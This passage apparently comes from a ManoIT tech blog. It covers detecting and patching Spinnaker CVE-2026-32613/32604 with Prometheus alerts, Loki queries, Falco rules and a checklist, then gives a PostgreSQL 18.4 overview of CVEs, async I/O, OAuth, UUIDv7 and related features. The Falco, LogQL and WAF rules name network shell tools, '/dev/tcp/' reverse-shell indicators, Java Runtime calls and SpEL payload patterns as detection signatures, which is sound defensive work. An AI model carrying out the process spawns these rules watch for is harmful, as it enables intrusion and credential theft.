  | jq -r 'select(.type=="match") | .data.path.text' | sort -u
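
Step 1 can also be done offline on saved logs. The following Python sketch assumes the log message shape shown in §2.3 (`SpelEvaluationException: type 'X' is not whitelisted`); `tally_blocked_types` is a hypothetical helper, and real log lines may need a different pattern.

```python
import re
from collections import Counter

# Message shape assumed from the §2.3 table:
#   SpelEvaluationException: type 'X' is not whitelisted
BLOCKED = re.compile(r"SpelEvaluationException: type '([^']+)' is not whitelisted")


def tally_blocked_types(lines):
    """Count how often each blocked type appears in an iterable of log lines."""
    counts = Counter()
    for line in lines:
        match = BLOCKED.search(line)
        if match:
            counts[match.group(1)] += 1
    # Most frequent first, as (type_name, count) pairs.
    return counts.most_common()
```

Passing an open log file (or `sys.stdin` when piping `kubectl logs` into the script) yields the types to search for in step 2, ordered by how often they were blocked.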

7. Observability — Detecting Unpatched Instances and Exploit Attempts

Just as important as the patch itself is detecting instances that aren't patched and actual exploit attempts. ManoIT monitors via Prometheus, Loki, and Falco — three axes.

7.1 Prometheus — Version Metric and Blocked SpEL Counter

# prometheus/rules/spinnaker-cve-2026-32613-32604.yml
groups:
- name: spinnaker-cve-2026-32613-32604
  rules:
  # 1) Alert if Spinnaker version is below the patched lines
  - alert: SpinnakerVulnerableVersion
    expr: |
      spinnaker_version_info{
        version!~"^(2026\\.1\\.[0-9]+|2026\\.0\\.[1-9][0-9]*|2025\\.4\\.([2-9]|[1-9][0-9]+)|2025\\.3\\.([2-9]|[1-9][0-9]+))$"
      } == 1
    for: 5m
    labels:
      severity: critical
      cve: "CVE-2026-32613,CVE-2026-32604"
    annotations:
      summary: "Spinnaker {{ $labels.instance }} runs vulnerable version {{ $labels.version }}"
      runbook: "https://runbooks.manoit.co.kr/spinnaker-cve-2026"

  # 2) Echo SpEL block counter rising (signal of normal post-patch behavior)
  - alert: EchoSpelBlockSpike
    expr: |
      rate(echo_spel_evaluation_blocked_total[5m]) > 0.5
    for: 10m
    labels:
      severity: warning
    annotations:
      summary: "Echo SpEL allowlist blocking {{ $value }} expressions/sec — review legitimate pipelines"

  # 3) Clouddriver gitrepo invalid ref counter (signal of exploit attempt)
  - alert: ClouddriverGitrepoInvalidRef
    expr: |
      rate(clouddriver_gitrepo_invalid_ref_total[5m]) > 0
    for: 1m
    labels:
      severity: critical
    annotations:
      summary: "Clouddriver rejected invalid git ref — possible CVE-2026-32604 exploit attempt"
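
A version-matching regex like the one in the first alert is easy to get subtly wrong, so it is worth exercising against known versions before the rule ships. The sketch below is one way to do that in Python, assuming Prometheus's fully anchored matching is equivalent to `re.fullmatch` for this pattern. `PATCHED` is a variant of the rule's pattern that also accepts two-digit patch numbers on the 2025 lines, and `is_patched` is a hypothetical helper.

```python
import re

# Patched-line pattern modelled on the alert rule. Accepting two-digit patch
# numbers on the 2025.3 and 2025.4 lines is an assumption of this sketch.
PATCHED = re.compile(
    r"2026\.1\.[0-9]+"
    r"|2026\.0\.[1-9][0-9]*"
    r"|2025\.4\.([2-9]|[1-9][0-9]+)"
    r"|2025\.3\.([2-9]|[1-9][0-9]+)"
)


def is_patched(version: str) -> bool:
    """True when the version string falls on one of the patched release lines."""
    return PATCHED.fullmatch(version) is not None
```

Note that any version the pattern does not know about, such as a later release line, is reported as unpatched, so the pattern has to be extended whenever a new line ships.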

7.2 Loki — Search Echo/Clouddriver Logs for RCE Indicators

# LogQL — blocked-class call attempts in Echo SpEL evaluation
{namespace="spinnaker", app="spin", cluster="spin-echo"}
  |~ "SpelEvaluationException"
  |~ "(java\\.lang\\.(Runtime|ProcessBuilder)|java\\.io\\.File|java\\.lang\\.reflect)"
  | line_format "{{.timestamp}} {{.pod}} {{.message}}"

# LogQL — Clouddriver gitrepo shell metachar injection attempts
{namespace="spinnaker", app="spin", cluster="spin-clouddriver"}
  |~ "InvalidGitArtifactException"
  |~ "[;&|`$()]"

# LogQL — 1-week SpEL block frequency stats post-patch
sum by (pod) (
  count_over_time(
    {namespace="spinnaker", cluster="spin-echo"}
    |~ "SpelEvaluationException" [1w]
  )
)

7.3 Falco — Detect Suspicious Subprocess at the Container Runtime

# /etc/falco/rules.d/spinnaker-rce.yaml
- rule: Spinnaker Echo unexpected subprocess
  desc: "Echo container should not spawn shell or network tools (CVE-2026-32613 indicator)"
  condition: >
    spawned_process and
    container.image.repository contains "spinnaker/echo" and
    (proc.name in (sh, bash, curl, wget, nc, ncat, python, perl, ruby) or
     proc.cmdline contains "/dev/tcp/")
  output: >
    Spinnaker Echo spawned suspicious process (user=%user.name command=%proc.cmdline
    container_id=%container.id image=%container.image.repository)
  priority: CRITICAL
  tags: [spinnaker, cve-2026-32613, rce]

- rule: Spinnaker Clouddriver gitrepo unexpected child
  desc: "Clouddriver gitrepo downloader should only spawn 'git' binary (CVE-2026-32604 indicator)"
  condition: >
    spawned_process and
    container.image.repository contains "spinnaker/clouddriver" and
    proc.pname = "java" and
    not proc.name in (git, git-remote-http, git-remote-https)
  output: >
    Spinnaker Clouddriver Java spawned non-git child process
    (command=%proc.cmdline parent=%proc.pname container_id=%container.id)
  priority: CRITICAL
  tags: [spinnaker, cve-2026-32604, rce]

8. ManoIT Internal Checklist — 4 Spinnaker Instances × 9 Phases

This operational checklist is distilled from the previous six sections. ManoIT runs four Spinnaker instances across a multi-cloud, multi-region environment, and patching all of them took about 36 hours.

#	Item	Owner	Done When
1	Inventory current versions of all Spinnaker instances	Platform	4 instances × version table merged
2	Immediately deploy `echo.pipelinetriggers.artifacts.enabled: false` on all Echo (workaround)	Platform	4 Echo deploys rolled out
3	Immediately deploy `artifacts.gitrepo.enabled: false` on all Clouddriver	Platform	4 Clouddriver deploys rolled out
4	Inventory pipelines using artifact / git/repo — identify affected triggers	Service owners	Affected pipeline inventory PR
5	Route affected pipeline triggers via Jenkins/GitLab CI calling the Spinnaker API	Service owners	First green workaround build
6	Upgrade 2 Operator instances to 2026.1.0	Platform	Both expose new version metric
7	Upgrade 1 Helm instance to 2026.1.0	Platform	helm get values shows spinnakerVersion=2026.1.0
8	Backport-patch 1 Halyard instance to 2025.4.2 (Operator migration as separate PR)	Platform	hal version shows 2025.4.2
9	Restore workarounds on each instance — artifacts.enabled / gitrepo.enabled	Platform	First green artifact-triggered auto-build
10	Regression check — identify legitimate pipelines from SpEL block logs and migrate	Service owners	Block counter at 0 or allowlist-add PR
11	Deploy 3 Prometheus alerts (SpinnakerVulnerableVersion, EchoSpelBlockSpike, ClouddriverGitrepoInvalidRef)	Observability	Alert fire/resolve test passes
12	Add 3 Loki LogQL dashboard panels	Observability	Grafana dashboard merged
13	Deploy 2 Falco rules (Echo unexpected subprocess, Clouddriver gitrepo unexpected child)	SRE	Rule fires on sample exploit
14	Retroactive 1-week scan of Echo/Clouddriver logs for exploit indicators	Security	Investigation report merged
15	Rotate cloud keys held by Spinnaker (preemptive assume-breach)	Infra	AWS / GCP / Azure key rotation complete
16	Review RBAC — clean up `APPLICATION_OWNER` holders	Security	Permission matrix PR merged
17	Add WAF rules in front of Spinnaker Gate — block SpEL payload pattern (`T\(java\.`)	Security	WAF deployed; bypass attempts rejected at the gate
18	Write operational RFC — Spinnaker security patch SLA (workaround within 24h, patch within 7d of disclosure)	Platform	RFC merged, reflected in quarterly security review

9. Conclusion — The Operational Cost of Ambiguous Trust Boundaries in Distributed Systems

The April 20, 2026 Spinnaker CVEs deliver a clear message: "Even microservices built by the same organization must consistently enforce standard defenses — trusted class allowlists, input validation — on a per-service basis." Orca has used a safe SpEL context for five years; Echo went five years without the same protection. Other Clouddriver artifact downloaders (http, s3, gcs) used the ProcessBuilder argv array directly; only the gitrepo downloader retained the sh -c path. Both are the result of inconsistency across "different modules in the same codebase."

Three operational reminders to close with. (1) Assume the patch window equals the PoC window: the same-day patches on April 20 and the ZeroPath PoC the next day are exactly that case. Pre-commit to an SLA that deploys workarounds within 24 hours of disclosure and patches within 7 days. (2) Allowlist patches can break legitimate behavior: actively harvest SpEL block logs for one week after patching and prepare migrations for the legitimate pipelines that turn up. (3) RCE must be paired with cloud key rotation: Spinnaker Clouddriver is the single store of multi-cloud credentials, so even without evidence of compromise, the standard is to rotate keys under the assume-breach principle. The 18-item checklist in §8 is those three principles unrolled into operational procedure, and the shortest one-line recommendation from this article is: "Deploy §4 workarounds today; apply the §5 patches this week."

ⓘ This article was authored by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) using the Spinnaker GHSA-69rw-45wj-g4v6 (CVE-2026-32613) and same-date CVE-2026-32604 security advisories — published April 20, 2026 — as primary sources. Versions, patch lines, and workaround procedures reflect the official guidance as of the publication date (2026-05-26) and may change with subsequent Spinnaker security team notices. Verify current state at spinnaker/spinnaker GitHub Security Advisories and spinnaker.io/docs release notes before applying in production. Internal case examples are adapted from ManoIT Platform Team's internal RFC.

Originally published at ManoIT Tech Blog.

PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints

daniel jeong — Fri, 22 May 2026 00:41:15 +0000

On May 14, 2026, the PostgreSQL Global Development Group released 18.4 alongside 17.10, 16.14, 15.18, and 14.23. On the surface it looks like the fourth minor update on the 18 line, but the contents make it effectively a "security major". The same day's security advisory closed 11 CVEs in one go — four of them at CVSS 8.8 (High), one allowing remote code execution via a stack buffer overflow in refint (CVE-2026-6637), and another exposing a timing channel that lets attackers recover credentials from the MD5 password comparison code (CVE-2026-6478). It's the kind of release where an operator needs to decide on the same page whether to patch now or wait until next week.

At the same time, the five structural changes PostgreSQL 18 (GA in September 2025) brought — io_uring-backed async I/O (2–3x read throughput), native OAuth 2.0 authentication in pg_hba.conf, the timestamp-ordered uuidv7() function, Virtual Generated Columns as the new default, and Temporal Constraints (WITHOUT OVERLAPS / PERIOD) — have now arrived in a stabilized form through the 18.4 patch line. This post starts with a priority matrix for all 11 CVEs, then walks through the postgresql.conf changes that most often trip up a 17 → 18 major upgrade, the pg_hba.conf patterns for connecting OAuth to Microsoft Entra ID, Okta, and Keycloak, measurements for each of the three io_method options (sync, worker, io_uring), and the 12-step verification sequence ManoIT applied to internal RDS and on-prem PostgreSQL 18 clusters.

1. Why May 14, 2026 is an Inflection Point for Database Operations

PostgreSQL 18 went GA on September 25, 2025, with 18.1 following in November 2025 and 18.4 on May 14, 2026. What makes 18.4 different is the convergence of three things: (a) 11 CVEs closed in a single release, (b) 60+ bug fixes from post-GA stabilization landing simultaneously, and (c) 18-era features like OAuth and io_uring now being stabilized through real patch cycles.

Date	Release / Event	Operational Meaning
2025.09.25	PostgreSQL 18.0 GA — async I/O, OAuth, uuidv7, virtual gen cols, temporal constraints	Major features arrive; only early adopters
2025.11.13	PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, 13.23	First minor on the 18 line — initial bug stabilization
2026.02.12	PostgreSQL 18.2, 17.8, 16.12, 15.16, 14.21	Final patch window for the 13 line
2026.05.08	PostgreSQL 13 EOL — no further patches	13 workloads must migrate to 14+
2026.05.14	PostgreSQL 18.4 + 17.10 + 16.14 + 15.18 + 14.23 — 11 CVEs patched simultaneously	Security patch required across every supported track
2026.05.14	Same day: 60+ bug fixes backported	autovacuum, logical replication, partitioning, pg_dump stability
2026.11 (expected)	PostgreSQL 19.0 beta expected to begin	18 enters its long stable phase

The two takeaways for operators: (1) the 13 line went EOL on May 8 and 18.4 arrived six days later, forcing "13 → 17 direct migration" timelines, and (2) at least four of the 11 CVEs trigger from external attack surface (an attacker only needing socket-level connection, or a low-privilege DB user). This is not a maintenance-window-of-convenience patch; it's a "do not push to the next quarter" patch.

2. The 11 CVE Priority Matrix — Which Attack Surfaces Closed

The 18.4 release notes detail seven core CVEs in the security advisory; the remaining four are memory-safety duplicates rolled into them. The entries to read first are the ones rated CVSS 8.8, and among them refint's stack buffer overflow is the only RCE triggerable by a low-privilege DB user.

CVE	CVSS	Severity	Component	Summary	Prerequisite
`CVE-2026-6473`	8.8	High	Multiple built-in functions — memory allocator	Integer underflow allocates undersized buffer → out-of-bounds write	Normal DB user with SQL execute
`CVE-2026-6475`	8.8	High	`pg_basebackup` / `pg_rewind`	Symlink following — origin superuser overwrites client-side files	Origin superuser + backup/restore command
`CVE-2026-6477`	8.8	High	Server superuser code paths	Server superuser overwrites client process stack memory	Server superuser + client RTT
`CVE-2026-6637`	8.8	High	`refint` extension	Stack buffer overflow → arbitrary code execution + SQL injection	Low-privilege DB user + `refint` trigger
`CVE-2026-6478`	5.9	Medium	MD5 password comparison	Covert timing channel — credentials recoverable	`md5` authentication in use (scram-sha-256 safe)
`CVE-2026-6479`	7.5	High	SSL / GSS negotiation	Uncontrolled recursion → sustained DoS	Anyone who can connect to a PostgreSQL socket (no auth required)
`CVE-2026-6476`	8.8	High	`ALTER SUBSCRIPTION ... REFRESH PUBLICATION`	Schema/relation names unquoted in SQL → arbitrary SQL on publisher	Subscriber owner

2.1 CVE-2026-6637 — refint Stack Buffer Overflow (Low-Privilege RCE)

The most dangerous of the 11 is CVE-2026-6637. refint is a legacy foreign-key integrity trigger module in PostgreSQL's contrib/spi, written in the late 1990s before native foreign keys existed. It's still packaged with the distribution and some legacy schemas still use its triggers. Before 18.4, when these triggers fire they pass column names and SQL identifiers through an internal buffer that can overflow the stack, which lets a low-privilege DB user execute arbitrary code and perform SQL injection. It's the only one of the 11 CVEs that turns into RCE under a regular user's privileges, so clusters with any refint footprint must patch first.

-- Check whether refint is in use anywhere in the cluster
SELECT n.nspname AS schema_name,
       p.proname AS function_name,
       c.relname AS table_name,
       t.tgname  AS trigger_name
FROM   pg_trigger t
JOIN   pg_proc    p ON p.oid = t.tgfoid
JOIN   pg_namespace n ON n.oid = p.pronamespace
JOIN   pg_class   c ON c.oid = t.tgrelid
WHERE  p.proname IN ('check_primary_key', 'check_foreign_key')
   AND NOT t.tgisinternal;

-- Any row of output means: patch to 18.4 immediately,
-- then migrate to standard foreign keys.

2.2 CVE-2026-6478 — MD5 Password Timing Channel

Second in importance: CVE-2026-6478. The server-side comparison between the client's MD5 response and the stored hash used a byte-by-byte short-circuit comparison, leaving a covert timing channel that lets attackers estimate how many leading bytes match. PostgreSQL has supported scram-sha-256 since version 10 (2017) and has used it as the default password_encryption since version 14 (2021), but late migrators, clusters keeping md5 for legacy compatibility, and clusters that explicitly set password_encryption=md5 are all in scope.

-- Find login roles whose stored password is still an MD5 hash
-- (reads pg_authid, so run it as a superuser)
SELECT rolname,
       CASE
         WHEN rolpassword LIKE 'md5%' THEN 'md5 (vulnerable)'
         WHEN rolpassword LIKE 'SCRAM-SHA-256%' THEN 'scram-sha-256 (safe)'
         ELSE 'plain/unknown'
       END AS auth_type
FROM   pg_authid
WHERE  rolcanlogin = true
ORDER  BY auth_type;

-- Also check postgresql.conf and pg_hba.conf:
-- postgresql.conf: password_encryption = scram-sha-256
-- pg_hba.conf:     host all all 0.0.0.0/0 scram-sha-256
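
The class of bug behind this CVE is easy to reproduce in any language. The Python sketch below is an illustration only, not PostgreSQL's code: `short_circuit_equal` returns at the first mismatching byte, so its running time grows with the length of the matching prefix, while `constant_time_equal` delegates to the standard library's `hmac.compare_digest`. Both function names are hypothetical.

```python
import hmac


def short_circuit_equal(a: bytes, b: bytes) -> bool:
    """Leaky comparison: returns as soon as one byte differs."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False  # earlier exit means a shorter matching prefix
    return True


def constant_time_equal(a: bytes, b: bytes) -> bool:
    """Comparison whose running time does not depend on where bytes differ."""
    return hmac.compare_digest(a, b)
```

Both functions return the same answers; only the second avoids revealing how far the comparison got before failing.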

2.3 CVE-2026-6479 — SSL/GSS Unbounded Recursion DoS

Third is the no-auth-required DoS in CVE-2026-6479. An attacker who can reach the PostgreSQL socket can send a specific sequence of messages during the SSL/GSS handshake; the handler then falls into unbounded recursion, exhausts stack space, kills backend processes, and in the worst case exhausts the backend slot pool, preventing legitimate users from connecting. RDS instances exposed to the internet on port 5432 with only VPC peering / IP allowlist as guardrails, or misconfigured NodePort services, are the highest-risk targets. Short-term mitigation: restrict hostssl and hostgssenc lines in pg_hba.conf to trusted CIDRs; permanent fix: patch to 18.4 / 17.10 / 16.14 / 15.18 / 14.23.

2.4 CVE-2026-6476 — ALTER SUBSCRIPTION REFRESH PUBLICATION SQL Injection

Fourth is an SQL injection in logical replication. When ALTER SUBSCRIPTION ... REFRESH PUBLICATION runs, the subscriber re-fetches the publisher's table list and interpolates schema/relation names into SQL commands without quoting. A subscriber owner who can control the publisher-side object names could execute arbitrary SQL on the publisher. 18.4 applies quote_ident() consistently when constructing those commands. Multi-tenant SaaS environments that separate publications per customer need to patch immediately.
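
The effect of identifier quoting is simple to demonstrate. The Python sketch below is a simplified, always-quote variant in the spirit of `quote_ident()`, not the PostgreSQL implementation (which quotes only when needed); `quote_identifier` and `qualified_name` are hypothetical helpers.

```python
def quote_identifier(name: str) -> str:
    """Wrap an SQL identifier in double quotes, doubling any embedded quotes."""
    if "\x00" in name:
        raise ValueError("identifier must not contain NUL bytes")
    return '"' + name.replace('"', '""') + '"'


def qualified_name(schema: str, relation: str) -> str:
    """Build a schema-qualified name that is safe to splice into SQL text."""
    return f"{quote_identifier(schema)}.{quote_identifier(relation)}"
```

With quoting in place, a relation name containing a quote and a trailing statement stays one (odd-looking) identifier instead of terminating the name and starting new SQL.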

3. PostgreSQL 18's Async I/O — Measured Differences Between io_method Options

The biggest architectural change in PostgreSQL 18 is the async I/O (AIO) subsystem. Through 17, backend processes read disk pages synchronously — a page cache miss stalled the entire backend. 18 introduces the io_method parameter so operators can choose between three dispatch strategies.

`io_method`	Behavior	Prerequisite	Typical Effect (Read-Heavy)
`sync`	Synchronous reads, same as pre-18	None	Baseline
`worker` (default)	Offload I/O to a dedicated worker process pool	None (all OS)	+20–30% on local SSD, +50–150% on network storage
`io_uring`	Direct use of Linux 5.1+ `io_uring` kernel interface	Linux 5.1+, build with `--with-liburing`	Lower CPU overhead vs worker, +0–50% throughput depending on workload

3.1 Step 1: io_method=worker — Safe in Almost Every Environment

The safest first step is io_method=worker. It runs on every OS, doesn't care about kernel version, and doesn't require special build flags. A dedicated worker pool issues page prefetches and the backend polls for results. The effect is largest on network storage (AWS EBS, GCP Persistent Disk, Azure Managed Disk). classmethod's RDS PostgreSQL 18 benchmark showed worker mode delivering roughly 2–3x the sequential-scan read throughput of sync. On local NVMe SSDs, where responses are already microsecond-class, the gain is closer to +20%.

# postgresql.conf — recommended baseline for io_method=worker
io_method = worker            # default in 18; changing it requires a restart
io_workers = 3                # worker process count, default 3; a reload is enough
effective_io_concurrency = 16 # prefetch depth (16 is the default in 18)
maintenance_io_concurrency = 32

# Monitoring: dispatched I/O count from pg_stat_io view
# SELECT * FROM pg_stat_io WHERE backend_type = 'io worker';

3.2 Step 2: io_method=io_uring — CPU Efficiency on Linux 5.1+

Once your workload stabilizes, the next step is io_uring. Binaries built with ./configure --with-liburing (or official RHEL/Ubuntu packages) on Linux 5.1+ can enable it. io_uring places a shared ring buffer between PostgreSQL and the kernel, cutting syscall overhead. Because no worker pool is needed, CPU usage drops vs worker mode, and high-concurrency OLTP workloads can squeeze additional throughput out. But container runtimes that block io_uring syscalls via seccomp (Docker's default seccomp profile, some GKE Autopilot nodes) will fail immediately.

# 1) Check kernel version
uname -r   # must be 5.1+, 6.x recommended

# 2) Verify liburing build support
psql -c "SHOW server_version;"
psql -c "SELECT name, setting, enumvals FROM pg_settings WHERE name = 'io_method';"
#  → enumvals should include 'io_uring'; it is absent in builds without liburing

# 3) Update postgresql.conf
echo 'io_method = io_uring' >> /etc/postgresql/18/main/postgresql.conf
systemctl restart postgresql@18-main

# 4) Verify io_uring dispatch from pg_stat_io
psql -c "SELECT * FROM pg_stat_io WHERE backend_type = 'client backend';"
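
The kernel check in step 1 is easy to get wrong when version strings are compared as text ("5.10" sorts before "5.4"). A minimal Python sketch of the comparison, assuming a release string in the usual `major.minor...` form printed by `uname -r`. The helper name `kernel_supports_io_uring` is hypothetical, and passing this check says nothing about liburing build support or seccomp filtering:

```python
import re

MIN_KERNEL = (5, 1)  # minimum kernel for io_uring, per the text above


def kernel_supports_io_uring(release: str) -> bool:
    """Return True if a `uname -r` style string is at least Linux 5.1."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if match is None:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    major, minor = int(match.group(1)), int(match.group(2))
    # Compare as integer tuples so that 5.10 sorts after 5.4
    return (major, minor) >= MIN_KERNEL
```

On the database host this could be called as `kernel_supports_io_uring(platform.release())` after `import platform`.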

3.3 Scope and Limits of AIO

A key constraint: PostgreSQL 18 AIO covers reads only. WAL writes and checkpoint dirty-page flushes still take the synchronous path, and on the read side the release applies AIO to sequential scans, bitmap heap scans, and VACUUM rather than to every access path. The result is that (a) read-heavy analytic workloads dominated by those scan types see the largest gains, while (b) write-heavy OLTP barely moves. shared_buffers and effective_cache_size also need to be tuned for the workload: if pages get evicted immediately after prefetch, AIO can't help.

4. OAuth 2.0 Native Authentication — Direct IdP Integration in pg_hba.conf

The second major change in 18 is that OAuth 2.0 authentication is a first-class method in pg_hba.conf. Previously the choices were LDAP, RADIUS, SSPI, PAM — for OAuth you needed an external auth proxy like pgbouncer-rr-patch or aws_iam. 18 adds oauth as a method so PostgreSQL itself validates tokens against IdPs (Okta, Microsoft Entra ID, Keycloak, Auth0, Google).

4.1 pg_hba.conf Baseline Patterns

# /etc/postgresql/18/main/pg_hba.conf
# TYPE   DATABASE   USER   ADDRESS        METHOD   OPTIONS

# Emergency access: keep scram-sha-256 for admin. Records are matched top-down
# and the first match wins, so this line must precede the oauth lines.
hostssl  all        admin  10.0.0.0/8     scram-sha-256

# OAuth: Keycloak realm 'manoit'
hostssl  myapp      all    10.0.0.0/8     oauth    issuer="https://idp.manoit.co.kr/realms/manoit" scope="openid profile email" map=oauth_map

# OAuth: Microsoft Entra ID (tenant ID required, custom scope)
hostssl  analytics  all    10.0.0.0/8     oauth    issuer="https://login.microsoftonline.com/{tenant-id}/v2.0" scope="api://{client-id}/.default" map=oauth_map

# OAuth: Okta org
hostssl  reporting  all    10.0.0.0/8     oauth    issuer="https://manoit.okta.com/oauth2/default" scope="openid offline_access" map=oauth_map

Key parameters:

issuer= — IdP issuer URL. OAuth is strict about issuer matching down to case and trailing slashes.
scope= — Requested scope. Entra ID's default scope does not work; you need a custom one like api://{client-id}/.default.
map= — A mapping name in pg_ident.conf that converts external identity (alice@manoit.co.kr) into a PostgreSQL role (alice).
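
PostgreSQL reads pg_hba.conf from top to bottom and uses the first record that matches the connection, with no fall-through to later records. That is why the position of a fallback line such as the scram-sha-256 entry matters. A simplified Python sketch of that first-match rule, assuming only database, user, and client address are compared (connection type, role groups, and special keywords are ignored). `HbaRule` and `first_match` are hypothetical names for illustration:

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class HbaRule:
    database: str  # database name or "all"
    user: str      # role name or "all"
    network: str   # CIDR block
    method: str    # e.g. "oauth", "scram-sha-256"


def first_match(rules, database, user, client_ip) -> Optional[str]:
    """Return the auth method of the first rule matching the connection."""
    for rule in rules:
        if rule.database not in ("all", database):
            continue
        if rule.user not in ("all", user):
            continue
        if ip_address(client_ip) not in ip_network(rule.network):
            continue
        return rule.method  # first match wins; later rules are never consulted
    return None  # no rule matched: the server rejects the connection


RULES = [
    HbaRule("all", "admin", "10.0.0.0/8", "scram-sha-256"),
    HbaRule("myapp", "all", "10.0.0.0/8", "oauth"),
]
```

With the admin rule first, `first_match(RULES, "myapp", "admin", "10.1.2.3")` resolves to scram-sha-256. With the two rules swapped, the same connection resolves to oauth and the emergency path is never reached for that database.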

4.2 pg_ident.conf Mapping Patterns

# /etc/postgresql/18/main/pg_ident.conf
# MAPNAME       SYSTEM-USERNAME              PG-USERNAME

oauth_map       /^(.+)@manoit\.co\.kr$       \1
oauth_map       alice@partner.com            partner_alice
oauth_map       admin@manoit.co.kr           postgres   # superuser mapping (literal match, so no regex escapes)
oauth_map       /^svc-(.+)@manoit\.co\.kr$   svc_\1     # service account pattern
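
Unlike pg_hba.conf, a pg_ident.conf map is not first-match: a connection is allowed if any entry pairs the external identity with the requested role. A minimal Python sketch of that lookup, assuming Python's `re` behaves like PostgreSQL's regular expressions for these simple patterns. `IDENT_MAP` and `allowed_roles` are hypothetical names, and the superuser entry is left out for brevity:

```python
import re

# (system-username, pg-username); a leading "/" marks a regular expression
IDENT_MAP = [
    (r"/^(.+)@manoit\.co\.kr$", r"\1"),
    ("alice@partner.com", "partner_alice"),
    (r"/^svc-(.+)@manoit\.co\.kr$", r"svc_\1"),
]


def allowed_roles(system_user: str) -> set[str]:
    """Return every role that the map lets this external identity use."""
    roles = set()
    for pattern, role in IDENT_MAP:
        if pattern.startswith("/"):
            match = re.search(pattern[1:], system_user)
            if match is None:
                continue
            # \1 in the role column is replaced by the first capture group
            if match.groups():
                role = role.replace(r"\1", match.group(1))
            roles.add(role)
        elif pattern == system_user:
            roles.add(role)  # literal entries must match exactly
    return roles
```

One consequence worth noticing: a service account such as `svc-billing@manoit.co.kr` matches both regex entries, so it may connect as `svc_billing` and, if such a role exists, as `svc-billing`.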

4.3 Validator Module Is Required

Important: PostgreSQL 18 core ships without an OAuth validator. Core provides the protocol handler and token validation framework; actual signature verification and claim mapping happen in a separate module. Percona's pg_oidc_validator is the most widely used open-source option, while commercial distributions (EnterpriseDB, Crunchy Data) bundle their own.

# postgresql.conf — load the validator library
oauth_validator_libraries = 'pg_oidc_validator'

# pg_oidc_validator.conf (module-specific settings)
[manoit]
issuer       = "https://idp.manoit.co.kr/realms/manoit"
jwks_uri     = "https://idp.manoit.co.kr/realms/manoit/protocol/openid-connect/certs"
audience     = "postgresql"
require_iss  = true
require_aud  = true
clock_skew_seconds = 60
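
To make the intent of the issuer, audience, and clock-skew settings concrete, here is a hedged Python sketch of the claim checks a validator typically performs. It is not pg_oidc_validator's implementation: it assumes the token signature has already been verified against the JWKS and the claims decoded into a dict, and `claims_acceptable` is a hypothetical helper name:

```python
import time
from typing import Optional

ISSUER = "https://idp.manoit.co.kr/realms/manoit"
AUDIENCE = "postgresql"
CLOCK_SKEW_SECONDS = 60


def claims_acceptable(claims: dict, now: Optional[float] = None) -> bool:
    """Check iss, aud, and exp on already-verified token claims."""
    now = time.time() if now is None else now
    # Issuer must match exactly, including case and trailing slash
    if claims.get("iss") != ISSUER:
        return False
    # "aud" may be a single string or a list of strings
    aud = claims.get("aud")
    audiences = [aud] if isinstance(aud, str) else list(aud or [])
    if AUDIENCE not in audiences:
        return False
    # Tolerate a small clock difference between IdP and database host
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)):
        return False
    return now <= exp + CLOCK_SKEW_SECONDS
```

Passing `now` explicitly keeps the function deterministic in tests; in production the default of the current time would be used.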

4.4 Client Connection

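# libpq 18+ built with OAuth (libcurl) support
# The URI stays on one line: a backslash-newline inside double quotes would
# leave the next line's indentation inside the connection string.
psql "postgres://alice@db.manoit.co.kr:5432/myapp?oauth_issuer=https://idp.manoit.co.kr/realms/manoit&oauth_client_id=postgres-client&sslmode=require"
# libpq's built-in flow is the OAuth device authorization grant: psql prints a
# verification URL and a user code to enter in a browser.
# Once issued, the token is forwarded to the PostgreSQL backend for validation.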

5. UUIDv7 — Timestamp-Ordered UUIDs as a First-Class Citizen

UUIDs have become a standard choice for application-generated IDs, but classical UUIDv4 is fully random: every new key dirties a different page in the B-Tree, inflating WAL and cache misses. 18 adds uuidv7() as a built-in function. UUIDv7 packs Unix epoch milliseconds into the first 48 bits and fills most of the remaining bits with random data, producing UUIDs that sort by creation time.

Strategy	Distribution	Hot Index Pages	WAL Burden	Read Cache Hit Rate
`uuidv4()`	Fully random	Spread across all pages	High (all pages dirtied)	Low
`uuidv7()`	Time-ordered	Concentrated on latest pages	Low (localized writes)	High
`bigserial`	Increasing integer	Concentrated on latest pages	Low	High

-- Use uuidv7() as a PK default in PostgreSQL 18
CREATE TABLE orders (
  id          UUID PRIMARY KEY DEFAULT uuidv7(),   -- ← 18 new
  customer_id BIGINT NOT NULL,
  amount      NUMERIC(12,2) NOT NULL,
  created_at  TIMESTAMPTZ NOT NULL DEFAULT now()
);

-- Extract the embedded timestamp from a UUIDv7
SELECT id,
       uuid_extract_timestamp(id) AS embedded_ts,
       created_at,
       uuid_extract_timestamp(id) - created_at AS skew
FROM   orders
ORDER  BY id DESC
LIMIT  5;

-- A schema pattern using uuidv7() to drop a redundant 'now()' column:
-- you can extract the timestamp from id itself, so created_at can be omitted.

Caveat: time ordering has limits. PostgreSQL's uuidv7() adds sub-millisecond timestamp precision and keeps values monotonic within a single backend, but UUIDs generated by different sessions at nearly the same instant are ordered only by their remaining random bits, so high-throughput workloads still see some page fragmentation. Still, index cache hit rates typically improve by 10–30 percentage points over UUIDv4.
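
The bit layout described in this section can be sketched in a few lines of Python. This follows only the basic version 7 layout (48-bit millisecond timestamp, version and variant bits, random remainder) and is not PostgreSQL's implementation. `make_uuidv7` and `extract_unix_ms` are hypothetical helper names:

```python
import os
import uuid


def make_uuidv7(unix_ms: int) -> uuid.UUID:
    """Build a version 7 UUID: 48-bit millisecond timestamp, then random bits."""
    rand = int.from_bytes(os.urandom(10), "big")  # 80 random bits
    value = (unix_ms & ((1 << 48) - 1)) << 80 | rand
    # Overwrite the 4 version bits (0111) and the 2 variant bits (10)
    value = (value & ~(0xF << 76)) | (0x7 << 76)
    value = (value & ~(0x3 << 62)) | (0x2 << 62)
    return uuid.UUID(int=value)


def extract_unix_ms(u: uuid.UUID) -> int:
    """Recover the embedded millisecond timestamp from the top 48 bits."""
    return u.int >> 80
```

Because the timestamp occupies the most significant bits, two UUIDs built for different milliseconds always compare in time order, whatever their random bits are. Within the same millisecond this sketch gives no ordering guarantee.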

